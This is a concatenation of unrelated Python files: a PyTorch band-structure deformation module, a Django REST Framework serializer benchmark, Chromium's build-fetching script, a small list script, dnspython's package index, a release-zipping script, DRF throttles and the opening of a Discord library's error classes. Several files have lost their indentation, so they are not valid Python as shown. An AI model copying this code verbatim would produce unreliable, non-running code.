if state_list is not None:
self.state_list = state_list
assert param_list is None, "provide either the param_list or the state_list, not both "
else:
assert param_list is not None, "provide either the param_list or the state_list"
param_list.append(mesh_size)
self.state_list = tb_utils.get_state_list(*param_list)
self.state_list = torch.tensor(np.array(self.state_list))
self.mesh_size = mesh_size
self.eulerangles_t = nn.Parameter(torch.zeros(3, self.mesh_size - 1))
self._init_params()
def _init_params(self):
nn.init.uniform_(self.eulerangles_t, -0.01, 0.01)
def deformation(self, eulerangles_t, state_t):
so3_t = torch.zeros((self.mesh_size - 1, 3, 3), dtype=torch.double)
deformed_t = torch.zeros_like(state_t)
so3_t[:, 0, 0] = torch.cos(eulerangles_t[0]) * torch.cos(eulerangles_t[2]) - torch.sin(eulerangles_t[0]) * torch.sin(eulerangles_t[2]) * torch.cos(eulerangles_t[1])
so3_t[:, 0, 1] = - torch.cos(eulerangles_t[0]) * torch.sin(eulerangles_t[2]) - torch.cos(eulerangles_t[1]) * torch.cos(eulerangles_t[2]) * torch.sin(eulerangles_t[0])
so3_t[:, 0, 2] = torch.sin(eulerangles_t[0]) * torch.sin(eulerangles_t[1])
so3_t[:, 1, 0] = torch.cos(eulerangles_t[2]) * torch.sin(eulerangles_t[0]) + torch.cos(eulerangles_t[0]) * torch.cos(eulerangles_t[1]) * torch.sin(eulerangles_t[2])
so3_t[:, 1, 1] = torch.cos(eulerangles_t[0]) * torch.cos(eulerangles_t[1]) * torch.cos(eulerangles_t[2]) - torch.sin(eulerangles_t[0]) * torch.sin(eulerangles_t[2])
so3_t[:, 1, 2] = - torch.cos(eulerangles_t[0]) * torch.sin(eulerangles_t[1])
so3_t[:, 2, 0] = torch.sin(eulerangles_t[1]) * torch.sin(eulerangles_t[2])
so3_t[:, 2, 1] = torch.cos(eulerangles_t[2]) * torch.sin(eulerangles_t[1])
so3_t[:, 2, 2] = torch.cos(eulerangles_t[1])
deformed_t[1:] = torch.matmul(so3_t, state_t[1:])
deformed_t[0] = state_t[0]
return deformed_t
def loss_v_s(self, state_t):
loss_v = 0.
loss_s = 0.
deformed_state = self.deformation(self.eulerangles_t, state_t)
for i in range(self.mesh_size - 1):
vol = torch.sqrt(torch.abs(1. - torch.abs(torch.matmul(deformed_state[i].view(1, 3), deformed_state[i + 1]))**2))
loss_v += vol
loss_s += vol**2
vol = torch.sqrt(torch.abs(1. - torch.abs(torch.matmul(deformed_state[-1].view(1, 3), deformed_state[0]))**2))
loss_v += vol
loss_s += vol**2
return loss_v, loss_s
    def loss_so3(self, eulerangles_t, state_t, vol_loss):
        """Note that eulerangles_t is one entry shorter than state_t."""
deformed_state = self.deformation(eulerangles_t, state_t)
similarity = torch.zeros(self.mesh_size)
average_length = abs(vol_loss / self.mesh_size)
for i in range(self.mesh_size - 1):
similarity[i] = torch.exp(-torch.sqrt(torch.abs(1. - torch.abs(torch.matmul(deformed_state[i].view(1, 3), deformed_state[i + 1]))**2)) / average_length)
        similarity[-1] = torch.exp(-torch.sqrt(torch.abs(1. - torch.abs(torch.matmul(deformed_state[-1].view(1, 3), deformed_state[0]))**2)) / average_length)  # wrap-around edge, same distance measure as the loop above
loss_so3 = torch.abs(eulerangles_t[:, 0]) * similarity[0] + torch.abs(eulerangles_t[:, -1]) * similarity[-1]
for i in range(self.mesh_size - 2):
loss_so3 += torch.abs(eulerangles_t[:, i] - eulerangles_t[:, i + 1]) * similarity[i + 1]
return torch.sum(loss_so3)
def find_deformation(self, n_loop, ratio=1.0, ratio_s=1.0, auto_ratio=True):
optimizer = torch.optim.Adam(self.parameters(), lr=0.01)
for n in range(n_loop):
if n < 10 and auto_ratio == True:
with torch.no_grad():
vol_loss, sparse_loss = self.loss_v_s(self.state_list)
dir_loss = self.loss_so3(self.eulerangles_t, self.state_list, vol_loss.item())
ratio_s = vol_loss.item() / sparse_loss.item()
ratio = vol_loss.item() / dir_loss.item()
if n % 10 == 0 and auto_ratio == True and n >= 10:
with torch.no_grad():
vol_loss, sparse_loss = self.loss_v_s(self.state_list)
dir_loss = self.loss_so3(self.eulerangles_t, self.state_list, vol_loss.item())
ratio_s = vol_loss.item() / sparse_loss.item()
if n == 10:
ratio = vol_loss.item() / dir_loss.item()
decay_rate = np.power(ratio, 0.1)
else:
ratio = max(ratio / decay_rate, 1.)
while ratio * dir_loss.item() / vol_loss.item() > 0.5:
ratio = ratio / 1.1
vol_loss, sparse_loss = self.loss_v_s(self.state_list)
dir_loss = self.loss_so3(self.eulerangles_t, self.state_list, vol_loss.item())
tot_loss = vol_loss + ratio * dir_loss + ratio_s * sparse_loss
optimizer.zero_grad()
tot_loss.backward()
optimizer.step()
def get_deformed_state(self):
with torch.no_grad():
learned_deformed_state = np.array(self.deformation(self.eulerangles_t, self.state_list))
return learned_deformed_state
def save_deformed_manifold(self, file_name_isomap, file_name_mds, n_components):
learned_deformed_state = self.get_deformed_state()
manifold = tb_manifold.tb_manifold(state_list=learned_deformed_state)
manifold.save_isomap(file_name_isomap, n_components=n_components)
manifold.save_mds(file_name_mds, n_components=n_components)
def save_deformed_manifold_persistence(self, file_name_persistence):
learned_deformed_state = self.get_deformed_state()
tda = tb_tda.tb_tda(state_list=learned_deformed_state)
tda.save_persistence(file_name_persistence)
def get_deformed_manifold_persistence(self):
learned_deformed_state = self.get_deformed_state()
tda = tb_tda.tb_tda(state_list=learned_deformed_state)
return tda.get_persistence()
if __name__ == "__main__":
trivial = tb_deformation_dirichlet(150, param_list=[1.0, -1.0, [0]])
trivial_manifold = tb_manifold.tb_manifold(state_list=trivial.get_deformed_state())
np.save('trivial_iso_pre', np.array(trivial_manifold.get_isomap_dim_list()))
np.save('trivial_mds_pre', np.array(trivial_manifold.get_mds_dim_list()))
trivial.save_deformed_manifold_persistence("figures_tb/deformed_dir_persistence_trivial_pre")
trivial.save_deformed_manifold("figures_tb/deformed_dir_isomap_trivial_pre", "figures_tb/deformed_dir_mds_trivial_pre", n_components=2)
trivial.find_deformation(3000)
trivial.save_deformed_manifold("figures_tb/deformed_dir_isomap_trivial", "figures_tb/deformed_dir_mds_trivial", n_components=2)
trivial.save_deformed_manifold_persistence("figures_tb/deformed_dir_persistence_trivial")
trivial_manifold = tb_manifold.tb_manifold(state_list=trivial.get_deformed_state())
np.save('trivial_iso', np.array(trivial_manifold.get_isomap_dim_list()))
np.save('trivial_mds', np.array(trivial_manifold.get_mds_dim_list()))
topological = tb_deformation_dirichlet(150, param_list=[1.0, 1.0, [0]])
topological_manifold = tb_manifold.tb_manifold(state_list=topological.get_deformed_state())
np.save('topological_iso_pre', np.array(topological_manifold.get_isomap_dim_list()))
np.save('topological_mds_pre', np.array(topological_manifold.get_mds_dim_list()))
topological.save_deformed_manifold_persistence("figures_tb/deformed_dir_persistence_topological_pre")
topological.save_deformed_manifold("figures_tb/deformed_dir_isomap_topological_pre", "figures_tb/deformed_dir_mds_topological_pre", n_components=2)
topological.find_deformation(3000)
topological.save_deformed_manifold("figures_tb/deformed_dir_isomap_topological", "figures_tb/deformed_dir_mds_topological", n_components=2)
topological.save_deformed_manifold_persistence("figures_tb/deformed_dir_persistence_topological")
topological_manifold = tb_manifold.tb_manifold(state_list=topological.get_deformed_state())
np.save('topological_iso', np.array(topological_manifold.get_isomap_dim_list()))
np.save('topological_mds', np.array(topological_manifold.get_mds_dim_list()))
|
py | b4036981d3fdeb95ed37cd6259deae0ae9b18032 | import os
import django
import timeit
import sys
sys.path.append(os.getcwd())
os.environ['DJANGO_SETTINGS_MODULE'] = 'tests.settings' # noqa
django.setup() # noqa
from rest_framework.serializers import Serializer, ModelSerializer
from rest_framework import fields
from tests.app import models
from tests.app.serializers import CategoryHierarchySerializer as CachedHierarchy
from django.db import connection
class UserSerializer(ModelSerializer):
class Meta:
model = models.User
fields = ('id', 'name')
class FilmCategorySerializer(ModelSerializer):
class Meta:
model = models.FilmCategory
fields = ('id', 'name')
class FilmSerializer(ModelSerializer):
uploaded_by = UserSerializer()
category = FilmCategorySerializer()
class Meta:
model = models.Film
fields = ('id', 'name', 'category', 'year', 'uploaded_by')
class CategoryHierarchySerializer(Serializer):
category = FilmCategorySerializer()
films = fields.SerializerMethodField()
categories = fields.SerializerMethodField()
def get_films(self, instance):
serializer = FilmSerializer(instance.films, many=True)
serializer.bind('*', self)
return serializer.data
def get_categories(self, instance):
serializer = self.__class__(instance.categories, many=True)
serializer.bind('*', self)
return serializer.data
def main():
user = models.User.objects.create(name='Bob')
top_category = models.FilmCategory.objects.create(name='All')
child_movies = models.FilmCategory.objects.create(
name='Child movies', parent_category=top_category)
cartoons = models.FilmCategory.objects.create(
name='Cartoons', parent_category=child_movies)
serious_stuff = models.FilmCategory.objects.create(
name='Serious', parent_category=top_category)
anime = models.FilmCategory.objects.create(
name='Anime', parent_category=serious_stuff)
object = models.CategoryHierarchy(
top_category,
categories=[
models.CategoryHierarchy(
child_movies,
categories=[
models.CategoryHierarchy(
cartoons,
films=[
models.Film.objects.create(name='Mickey Mouse',
year=1966,
uploaded_by=user,
category=cartoons)
for _ in range(10)
]
)
]
),
models.CategoryHierarchy(
serious_stuff,
categories=[
models.CategoryHierarchy(
anime,
films=[
models.Film.objects.create(name='Ghost in the shell',
year=1989,
uploaded_by=user,
category=anime)
for _ in range(10)
]
)
]
),
])
def simple_serialize():
return CategoryHierarchySerializer(object).data
def cached_serialize():
return CachedHierarchy(object).data
assert simple_serialize() == cached_serialize(), 'Result is wrong'
print('Model with recursion serializer: ',
timeit.timeit('simple_serialize()',
globals={'simple_serialize': simple_serialize},
number=500))
print('Cached model with recursion serializer: ',
timeit.timeit('cached_serialize()',
globals={'cached_serialize': cached_serialize},
number=500))
if __name__ == '__main__':
connection.creation.create_test_db()
main()
connection.creation.destroy_test_db()
|
py | b4036ac23fe376e6fdc0a4306112e3bc74cd6156 | # Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""This module contains functions for fetching and extracting archived builds.
The builds may be stored in different places by different types of builders;
for example, builders on tryserver.chromium.perf stores builds in one place,
while builders on chromium.linux store builds in another.
This module can be either imported or run as a stand-alone script to download
and extract a build.
Usage: fetch_build.py <type> <revision> <output_dir> [options]
"""
import argparse
import errno
import logging
import os
import shutil
import sys
import zipfile
# Telemetry (src/tools/telemetry) is expected to be in the PYTHONPATH.
from telemetry.util import cloud_storage
import bisect_utils
# Possible builder types.
PERF_BUILDER = 'perf'
FULL_BUILDER = 'full'
ANDROID_CHROME_PERF_BUILDER = 'android-chrome-perf'
# Maximum time in seconds to wait after posting build request to the try server.
MAX_MAC_BUILD_TIME = 14400
MAX_WIN_BUILD_TIME = 14400
MAX_LINUX_BUILD_TIME = 14400
# Try server status page URLs, used to get build status.
PERF_TRY_SERVER_URL = 'http://build.chromium.org/p/tryserver.chromium.perf'
LINUX_TRY_SERVER_URL = 'http://build.chromium.org/p/tryserver.chromium.linux'
def GetBucketAndRemotePath(revision, builder_type=PERF_BUILDER,
target_arch='ia32', target_platform='chromium',
deps_patch_sha=None, extra_src=None):
"""Returns the location where a build archive is expected to be.
Args:
revision: Revision string, e.g. a git commit hash or SVN revision.
builder_type: Type of build archive.
target_arch: Architecture, e.g. "ia32".
target_platform: Platform name, e.g. "chromium" or "android".
deps_patch_sha: SHA1 hash which identifies a particular combination of
custom revisions for dependency repositories.
extra_src: Path to a script which can be used to modify the bisect script's
behavior.
Returns:
A pair of strings (bucket, path), where the archive is expected to be.
"""
logging.info('Getting GS URL for archive of builder "%s", "%s", "%s".',
builder_type, target_arch, target_platform)
build_archive = BuildArchive.Create(
builder_type, target_arch=target_arch, target_platform=target_platform,
extra_src=extra_src)
bucket = build_archive.BucketName()
remote_path = build_archive.FilePath(revision, deps_patch_sha=deps_patch_sha)
return bucket, remote_path
def GetBuilderNameAndBuildTime(builder_type=PERF_BUILDER, target_arch='ia32',
target_platform='chromium', extra_src=None):
"""Gets builder bot name and build time in seconds based on platform."""
logging.info('Getting builder name for builder "%s", "%s", "%s".',
builder_type, target_arch, target_platform)
build_archive = BuildArchive.Create(
builder_type, target_arch=target_arch, target_platform=target_platform,
extra_src=extra_src)
return build_archive.GetBuilderName(), build_archive.GetBuilderBuildTime()
def GetBuildBotUrl(builder_type=PERF_BUILDER, target_arch='ia32',
target_platform='chromium', extra_src=None):
"""Gets buildbot URL for a given builder type."""
logging.info('Getting buildbot URL for "%s", "%s", "%s".',
builder_type, target_arch, target_platform)
build_archive = BuildArchive.Create(
builder_type, target_arch=target_arch, target_platform=target_platform,
extra_src=extra_src)
return build_archive.GetBuildBotUrl()
class BuildArchive(object):
"""Represents a place where builds of some type are stored.
There are two pieces of information required to locate a file in Google
Cloud Storage, bucket name and file path. Subclasses of this class contain
specific logic about which bucket names and paths should be used to fetch
a build.
"""
@staticmethod
def Create(builder_type, target_arch='ia32', target_platform='chromium',
extra_src=None):
if builder_type == PERF_BUILDER:
return PerfBuildArchive(target_arch, target_platform)
if builder_type == FULL_BUILDER:
return FullBuildArchive(target_arch, target_platform)
if builder_type == ANDROID_CHROME_PERF_BUILDER:
try:
# Load and initialize a module in extra source file and
# return its module object to access android-chrome specific data.
loaded_extra_src = bisect_utils.LoadExtraSrc(extra_src)
return AndroidChromeBuildArchive(
target_arch, target_platform, loaded_extra_src)
except (IOError, TypeError, ImportError):
raise RuntimeError('Invalid or missing --extra_src. [%s]' % extra_src)
raise NotImplementedError('Builder type "%s" not supported.' % builder_type)
def __init__(self, target_arch='ia32', target_platform='chromium',
extra_src=None):
self._extra_src = extra_src
if bisect_utils.IsLinuxHost() and target_platform == 'android':
self._platform = 'android'
elif bisect_utils.IsLinuxHost() and target_platform == 'android-chrome':
self._platform = 'android-chrome'
elif bisect_utils.IsLinuxHost():
self._platform = 'linux'
elif bisect_utils.IsMacHost():
self._platform = 'mac'
elif bisect_utils.Is64BitWindows() and target_arch == 'x64':
self._platform = 'win64'
elif bisect_utils.IsWindowsHost():
self._platform = 'win'
else:
raise NotImplementedError('Unknown platform "%s".' % sys.platform)
def BucketName(self):
raise NotImplementedError()
def FilePath(self, revision, deps_patch_sha=None):
"""Returns the remote file path to download a build from.
Args:
revision: A Chromium revision; this could be a git commit hash or
commit position or SVN revision number.
deps_patch_sha: The SHA1 hash of a patch to the DEPS file, which
uniquely identifies a change to use a particular revision of
a dependency.
Returns:
      A file path, which does not include a bucket name.
"""
raise NotImplementedError()
def _ZipFileName(self, revision, deps_patch_sha=None):
"""Gets the file name of a zip archive for a particular revision.
This returns a file name of the form full-build-<platform>_<revision>.zip,
which is a format used by multiple types of builders that store archives.
Args:
revision: A git commit hash or other revision string.
deps_patch_sha: SHA1 hash of a DEPS file patch.
Returns:
The archive file name.
"""
base_name = 'full-build-%s' % self._PlatformName()
if deps_patch_sha:
revision = '%s_%s' % (revision, deps_patch_sha)
return '%s_%s.zip' % (base_name, revision)
def _PlatformName(self):
"""Return a string to be used in paths for the platform."""
if self._platform in ('win', 'win64'):
# Build archive for win64 is still stored with "win32" in the name.
return 'win32'
if self._platform in ('linux', 'android'):
# Android builds are also stored with "linux" in the name.
return 'linux'
if self._platform == 'mac':
return 'mac'
raise NotImplementedError('Unknown platform "%s".' % sys.platform)
def GetBuilderName(self):
raise NotImplementedError()
def GetBuilderBuildTime(self):
"""Returns the time to wait for a build after requesting one."""
if self._platform in ('win', 'win64'):
return MAX_WIN_BUILD_TIME
if self._platform in ('linux', 'android', 'android-chrome'):
return MAX_LINUX_BUILD_TIME
if self._platform == 'mac':
return MAX_MAC_BUILD_TIME
raise NotImplementedError('Unsupported Platform "%s".' % sys.platform)
def GetBuildBotUrl(self):
raise NotImplementedError()
class PerfBuildArchive(BuildArchive):
def BucketName(self):
return 'chrome-perf'
def FilePath(self, revision, deps_patch_sha=None):
return '%s/%s' % (self._ArchiveDirectory(),
self._ZipFileName(revision, deps_patch_sha))
def _ArchiveDirectory(self):
"""Returns the directory name to download builds from."""
platform_to_directory = {
'android': 'android_perf_rel',
'linux': 'Linux Builder',
'mac': 'Mac Builder',
'win64': 'Win x64 Builder',
'win': 'Win Builder',
}
assert self._platform in platform_to_directory
return platform_to_directory.get(self._platform)
def GetBuilderName(self):
"""Gets builder bot name based on platform."""
if self._platform == 'win64':
return 'win_x64_perf_bisect_builder'
elif self._platform == 'win':
return 'win_perf_bisect_builder'
elif self._platform == 'linux':
return 'linux_perf_bisect_builder'
elif self._platform == 'android':
return 'android_perf_bisect_builder'
elif self._platform == 'mac':
return 'mac_perf_bisect_builder'
raise NotImplementedError('Unsupported platform "%s".' % sys.platform)
def GetBuildBotUrl(self):
"""Returns buildbot URL for fetching build info."""
return PERF_TRY_SERVER_URL
class FullBuildArchive(BuildArchive):
def BucketName(self):
platform_to_bucket = {
'android': 'chromium-android',
'linux': 'chromium-linux-archive',
'mac': 'chromium-mac-archive',
'win64': 'chromium-win-archive',
'win': 'chromium-win-archive',
}
assert self._platform in platform_to_bucket
return platform_to_bucket.get(self._platform)
def FilePath(self, revision, deps_patch_sha=None):
return '%s/%s' % (self._ArchiveDirectory(),
self._ZipFileName(revision, deps_patch_sha))
def _ArchiveDirectory(self):
"""Returns the remote directory to download builds from."""
platform_to_directory = {
'android': 'android_main_rel',
'linux': 'chromium.linux/Linux Builder',
'mac': 'chromium.mac/Mac Builder',
'win64': 'chromium.win/Win x64 Builder',
'win': 'chromium.win/Win Builder',
}
assert self._platform in platform_to_directory
return platform_to_directory.get(self._platform)
def GetBuilderName(self):
"""Gets builder bot name based on platform."""
if self._platform == 'linux':
return 'linux_full_bisect_builder'
raise NotImplementedError('Unsupported platform "%s".' % sys.platform)
def GetBuildBotUrl(self):
"""Returns buildbot URL for fetching build info."""
return LINUX_TRY_SERVER_URL
class AndroidChromeBuildArchive(BuildArchive):
"""Represents a place where builds of android-chrome type are stored.
If AndroidChromeBuildArchive is used, it is assumed that the --extra_src
is a valid Python module which contains the module-level functions
GetBucketName and GetArchiveDirectory.
"""
def BucketName(self):
return self._extra_src.GetBucketName()
def _ZipFileName(self, revision, deps_patch_sha=None):
"""Gets the file name of a zip archive on android-chrome.
This returns a file name of the form build_product_<revision>.zip,
which is a format used by android-chrome.
Args:
revision: A git commit hash or other revision string.
deps_patch_sha: SHA1 hash of a DEPS file patch.
Returns:
The archive file name.
"""
if deps_patch_sha:
revision = '%s_%s' % (revision, deps_patch_sha)
return 'build_product_%s.zip' % revision
def FilePath(self, revision, deps_patch_sha=None):
return '%s/%s' % (self._ArchiveDirectory(),
self._ZipFileName(revision, deps_patch_sha))
def _ArchiveDirectory(self):
"""Returns the directory name to download builds from."""
return self._extra_src.GetArchiveDirectory()
def GetBuilderName(self):
"""Returns the builder name extra source."""
return self._extra_src.GetBuilderName()
def GetBuildBotUrl(self):
"""Returns buildbot URL for fetching build info."""
return self._extra_src.GetBuildBotUrl()
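# Illustrative shape of an --extra_src module for AndroidChromeBuildArchive.
# The function names below are implied by the calls above; the return values
# are placeholders, not real bucket or builder names.
#
#   def GetBucketName(): return 'example-android-chrome-bucket'
#   def GetArchiveDirectory(): return 'example/archive/dir'
#   def GetBuilderName(): return 'example_android_chrome_builder'
#   def GetBuildBotUrl(): return 'http://example.com/p/tryserver.example'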
def BuildIsAvailable(bucket_name, remote_path):
"""Checks whether a build is currently archived at some place."""
logging.info('Checking existence: gs://%s/%s' % (bucket_name, remote_path))
try:
exists = cloud_storage.Exists(bucket_name, remote_path)
logging.info('Exists? %s' % exists)
return exists
except cloud_storage.CloudStorageError:
return False
def FetchFromCloudStorage(bucket_name, source_path, destination_dir):
"""Fetches file(s) from the Google Cloud Storage.
As a side-effect, this prints messages to stdout about what's happening.
Args:
bucket_name: Google Storage bucket name.
source_path: Source file path.
destination_dir: Destination file path.
Returns:
Local file path of downloaded file if it was downloaded. If the file does
not exist in the given bucket, or if there was an error while downloading,
None is returned.
"""
target_file = os.path.join(destination_dir, os.path.basename(source_path))
gs_url = 'gs://%s/%s' % (bucket_name, source_path)
try:
if cloud_storage.Exists(bucket_name, source_path):
logging.info('Fetching file from %s...', gs_url)
cloud_storage.Get(bucket_name, source_path, target_file)
if os.path.exists(target_file):
return target_file
else:
logging.info('File %s not found in cloud storage.', gs_url)
return None
except Exception as e:
logging.warn('Exception while fetching from cloud storage: %s', e)
if os.path.exists(target_file):
os.remove(target_file)
return None
def Unzip(file_path, output_dir, verbose=True):
"""Extracts a zip archive's contents into the given output directory.
This was based on ExtractZip from build/scripts/common/chromium_utils.py.
Args:
file_path: Path of the zip file to extract.
output_dir: Path to the destination directory.
verbose: Whether to print out what is being extracted.
Raises:
IOError: The unzip command had a non-zero exit code.
RuntimeError: Failed to create the output directory.
"""
_MakeDirectory(output_dir)
# On Linux and Mac, we use the unzip command because it handles links and
# file permissions bits, so achieving this behavior is easier than with
# ZipInfo options.
#
# The Mac Version of unzip unfortunately does not support Zip64, whereas
# the python module does, so we have to fall back to the python zip module
# on Mac if the file size is greater than 4GB.
mac_zip_size_limit = 2 ** 32 # 4GB
if (bisect_utils.IsLinuxHost() or
(bisect_utils.IsMacHost()
and os.path.getsize(file_path) < mac_zip_size_limit)):
unzip_command = ['unzip', '-o']
_UnzipUsingCommand(unzip_command, file_path, output_dir)
return
# On Windows, try to use 7z if it is installed, otherwise fall back to the
# Python zipfile module. If 7z is not installed, then this may fail if the
# zip file is larger than 512MB.
sevenzip_path = r'C:\Program Files\7-Zip\7z.exe'
if bisect_utils.IsWindowsHost() and os.path.exists(sevenzip_path):
unzip_command = [sevenzip_path, 'x', '-y']
_UnzipUsingCommand(unzip_command, file_path, output_dir)
return
_UnzipUsingZipFile(file_path, output_dir, verbose)
def _UnzipUsingCommand(unzip_command, file_path, output_dir):
"""Extracts a zip file using an external command.
Args:
unzip_command: An unzipping command, as a string list, without the filename.
file_path: Path to the zip file.
output_dir: The directory which the contents should be extracted to.
Raises:
IOError: The command had a non-zero exit code.
"""
absolute_filepath = os.path.abspath(file_path)
command = unzip_command + [absolute_filepath]
return_code = _RunCommandInDirectory(output_dir, command)
if return_code:
_RemoveDirectoryTree(output_dir)
raise IOError('Unzip failed: %s => %s' % (str(command), return_code))
def _RunCommandInDirectory(directory, command):
"""Changes to a directory, runs a command, then changes back."""
saved_dir = os.getcwd()
os.chdir(directory)
return_code = bisect_utils.RunProcess(command)
os.chdir(saved_dir)
return return_code
def _UnzipUsingZipFile(file_path, output_dir, verbose=True):
"""Extracts a zip file using the Python zipfile module."""
assert bisect_utils.IsWindowsHost() or bisect_utils.IsMacHost()
zf = zipfile.ZipFile(file_path)
for name in zf.namelist():
if verbose:
print 'Extracting %s' % name
zf.extract(name, output_dir)
if bisect_utils.IsMacHost():
# Restore file permission bits.
mode = zf.getinfo(name).external_attr >> 16
os.chmod(os.path.join(output_dir, name), mode)
def _MakeDirectory(path):
try:
os.makedirs(path)
except OSError as e:
if e.errno != errno.EEXIST:
raise
def _RemoveDirectoryTree(path):
try:
if os.path.exists(path):
shutil.rmtree(path)
  except OSError as e:
if e.errno != errno.ENOENT:
raise
def Main(argv):
"""Downloads and extracts a build based on the command line arguments."""
parser = argparse.ArgumentParser()
parser.add_argument('builder_type')
parser.add_argument('revision')
parser.add_argument('output_dir')
parser.add_argument('--target-arch', default='ia32')
parser.add_argument('--target-platform', default='chromium')
parser.add_argument('--deps-patch-sha')
args = parser.parse_args(argv[1:])
bucket_name, remote_path = GetBucketAndRemotePath(
args.revision, args.builder_type, target_arch=args.target_arch,
target_platform=args.target_platform,
deps_patch_sha=args.deps_patch_sha)
print 'Bucket name: %s, remote path: %s' % (bucket_name, remote_path)
if not BuildIsAvailable(bucket_name, remote_path):
print 'Build is not available.'
return 1
FetchFromCloudStorage(bucket_name, remote_path, args.output_dir)
print 'Build has been downloaded to and extracted in %s.' % args.output_dir
return 0
if __name__ == '__main__':
sys.exit(Main(sys.argv))
|
py | b4036ae23fdef55c87b07b5c4a2437caa85a4028 | #list comprehensions
#printing only even numbers in a list
import random
y = int(input("Enter the number of elements in the list:"))
x = (random.sample(range(1,100),y))
print(x)
new_list1=[]
new_list2=[]
for i in x:
if i%2 == 0:
new_list1.append(i)
else:
new_list2.append(i)
print("The even elements are: ")
print(new_list1)
print("The odd elements are: ")
print(new_list2)
|
py | b4036afd34f509c3c180d268a555695dc59c70a4 | # Copyright (C) 2003-2005 Nominum, Inc.
#
# Permission to use, copy, modify, and distribute this software and its
# documentation for any purpose with or without fee is hereby granted,
# provided that the above copyright notice and this permission notice
# appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND NOMINUM DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL NOMINUM BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT
# OF OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
"""dnspython DNS toolkit"""
__all__ = [
'dnssec',
'e164',
'exception',
'flags',
'inet',
'ipv4',
'ipv6',
'message',
'name',
'namedict',
'node',
'opcode',
'query',
'rcode',
'rdata',
'rdataclass',
'rdataset',
'rdatatype',
'renderer',
'resolver',
'reversename',
'rrset',
'set',
'tokenizer',
'tsig',
'tsigkeyring',
'ttl',
'rdtypes',
'update',
'version',
'zone',
]
|
py | b4036b3d7abc5a0b45c81aa35841ea63611dc7b5 | from pathlib import Path
import hashlib
import subprocess
import sys
import zipfile
if len(sys.argv) < 2:
print('Please specify the release version as the first argument, e.g. ./publish.py 1.21')
exit(-1)
version = sys.argv[1]
subprocess.run(['git', 'fetch', '--tags'], check=True)
output = subprocess.run(['git', 'tag', version])
if output.returncode != 0:
print(f'Tag {version} already exists. Please choose another one.')
exit(-2)
paths = [
Path('application.py'),
Path('application_database.py'),
Path('application_login.py'),
Path('application_utils.py'),
Path('data'),
Path('engine'),
Path('pages'),
Path('requirements.txt'),
Path('requirements'),
# Path('.ebextensions/https-instance.config'),
Path('install-google-chrome.sh'),
Path('robots.txt'),
]
all_paths = []
for path in paths:
if path.is_file():
all_paths.append(path)
else:
all_paths += list(path.glob('**/*'))
# path = path.parent / (path.stem + path.suffix)
# path = path.parent / path.name
replacements = {'%version%': version}
for path in all_paths:
if path.suffix == '.js':
hash = hashlib.sha256()
hash.update(path.read_bytes())
replacements[path.name] = f'{path.stem}-{hash.hexdigest()[:8]}{path.suffix}'
z = zipfile.ZipFile(f'{version}.zip', 'w')
root = Path(__file__).parent.resolve()
for path in all_paths:
path = path.resolve()
arcname = str(path.relative_to(root))
if path.suffix in ['.js', '.html', '.py']:
with path.open() as f:
contents = f.read()
for key in replacements:
contents = contents.replace(key, replacements[key])
arcname = arcname.replace(key, replacements[key])
z.writestr(arcname, contents)
else:
z.write(path, arcname)
z.close()
subprocess.run(['git', 'push', 'origin', version], check=True)
|
py | b4036c9cf484b99b7638332a3b9fa8bc066fe84a | from rest_framework.throttling import SimpleRateThrottle
class AnonThrottle(SimpleRateThrottle):
scope = 'anon'
def get_cache_key(self, request, view):
if request.user:
if request.user.user_type == 2:
ident = request.user.pk
return self.cache_format % {
'scope': self.scope,
'ident': ident
}
class UserThrottle(SimpleRateThrottle):
scope = 'user'
def get_cache_key(self, request, view):
if request.user:
ident = request.user.pk
else:
ident = self.get_ident(request)
return self.cache_format % {
'scope': self.scope,
'ident': ident
}
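# Example wiring (a sketch; the dotted paths and rates are assumptions, not part
# of this module; DRF reads them from the REST_FRAMEWORK setting):
#
#   REST_FRAMEWORK = {
#       'DEFAULT_THROTTLE_CLASSES': [
#           'myapp.throttles.AnonThrottle',
#           'myapp.throttles.UserThrottle',
#       ],
#       'DEFAULT_THROTTLE_RATES': {
#           'anon': '20/minute',   # keyed by AnonThrottle.scope
#           'user': '100/minute',  # keyed by UserThrottle.scope
#       },
#   }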
|
py | b4036e951faf49ff07dc968aaf57a7c15fa075ec | # -*- coding: utf-8 -*-
# Copyright © tandemdude 2020-present
#
# This file is part of Lightbulb.
#
# Lightbulb is free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Lightbulb is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with Lightbulb. If not, see <https://www.gnu.org/licenses/>.
from __future__ import annotations
__all__ = [
"LightbulbError",
"UnsupportedResponseOperation",
"ApplicationCommandCreationFailed",
"CommandNotFound",
"CommandInvocationError",
"CommandIsOnCooldown",
"ConverterFailure",
"NotEnoughArguments",
"MissingRequiredAttachmentArgument",
"MaxConcurrencyLimitReached",
"CheckFailure",
"InsufficientCache",
"NotOwner",
"OnlyInGuild",
"OnlyInDM",
"BotOnly",
"WebhookOnly",
"HumanOnly",
"NSFWChannelOnly",
"ExtensionMissingUnload",
"ExtensionNotFound",
"ExtensionNotLoaded",
"ExtensionMissingLoad",
"ExtensionAlreadyLoaded",
"CommandAlreadyExists",
"MissingRequiredRole",
"MissingRequiredPermission",
"BotMissingRequiredPermission",
"MissingRequiredAttachment",
]
import typing as t
import warnings
import hikari
if t.TYPE_CHECKING:
from lightbulb import commands
class LightbulbError(Exception):
"""
Base lightbulb exception class. All errors raised by lightbulb will be a subclass
of this exception.
"""
class UnsupportedResponseOperation(LightbulbError):
"""
Exception raised when ``edit`` or ``delete`` is called on a response that cannot be
